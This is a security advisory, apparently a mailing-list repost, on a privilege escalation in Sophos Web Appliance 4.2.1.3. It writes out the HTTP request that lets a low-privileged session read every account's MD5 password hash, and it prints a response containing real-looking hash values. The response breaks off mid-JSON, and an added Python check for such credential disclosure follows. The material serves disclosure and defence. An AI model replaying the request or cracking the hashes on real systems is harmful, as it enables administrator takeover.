Friday, November 4, 2016
[FD] KL-001-2016-008 : Sophos Web Appliance Privilege Escalation
Title: Sophos Web Appliance Privilege Escalation
Advisory ID: KL-001-2016-008
Publication Date: 2016.11.03
Publication URL: http://ift.tt/2f1NIGv

1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Appliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords
     Impact: Privilege Escalation
     Attack vector: HTTP

2. Vulnerability Description

     An unprivileged user can obtain an MD5 hash of the administrator
     password, which can then be used to discover the plain-text password.

3. Technical Description

     A user with any of the Helpdesk, Policy, Reporting, or User Activity
     privileges can obtain an MD5 hash for the Full Access Administrator
     account. A valid session identifier is required and is delivered
     through the STYLE parameter.

     GET /index.php?c=change_password&STYLE=7151e50b0389755717510f218b1af00c HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     Connection: close

     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 00:36:43 GMT
     Server: Apache
     X-UA-Compatible: IE=7
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 8798

     ...
{"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\n \n
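
The response above embeds every account record, including its password hash, in the usersJS string sent to a low-privileged session. The following is an added example, not part of the advisory or of Sophos code: a regression check that decodes that nested JSON and reports disclosed credential fields. The sample body and hash values are constructed, and redact_for_client is an assumed corrected response shape, not the vendor's fix.

```python
import json
import re

MD5_SHAPED = re.compile(r"^[0-9a-fA-F]{32}$")  # 32 hex chars, unsalted MD5 shape
SECRET_KEYS = ("password",)  # field name as it appears in the response above


def decode_users(body):
    """Return (currentUser, user records); usersJS is JSON nested in a string."""
    model = json.loads(body)
    users = model.get("usersJS", "[]")
    if isinstance(users, str):
        users = json.loads(users)  # second decode of the embedded document
    return model.get("currentUser"), users


def find_exposed_credentials(body):
    """List every credential field the response hands to the session user."""
    current, users = decode_users(body)
    return [{
        "username": user.get("username"),
        "other_account": user.get("username") != current,
        "admin": bool(user.get("admin")),
        "md5_shaped": bool(MD5_SHAPED.match(str(user[key]))),
    } for user in users for key in SECRET_KEYS if key in user]


def redact_for_client(body):
    """Assumed corrected shape: only the caller's own record, no secret fields."""
    model = json.loads(body)
    current, users = decode_users(body)
    safe = [{k: v for k, v in u.items() if k not in SECRET_KEYS}
            for u in users if u.get("username") == current]
    model["usersJS"] = json.dumps(safe)
    return json.dumps(model)


# Constructed sample in the advisory's format; hash values are dummies.
SAMPLE = json.dumps({
    "currentUser": "test",
    "usersJS": json.dumps([
        {"username": "admin", "password": "0" * 32, "admin": True},
        {"username": "test", "password": "1" * 32, "admin": False},
    ]),
})

if __name__ == "__main__":
    for finding in find_exposed_credentials(SAMPLE):
        print(finding)
    print(find_exposed_credentials(redact_for_client(SAMPLE)))
```

Any finding with other_account set means the page is returning another user's credential material; a finding on the caller's own record is still a disclosure, since the client never needs the stored hash.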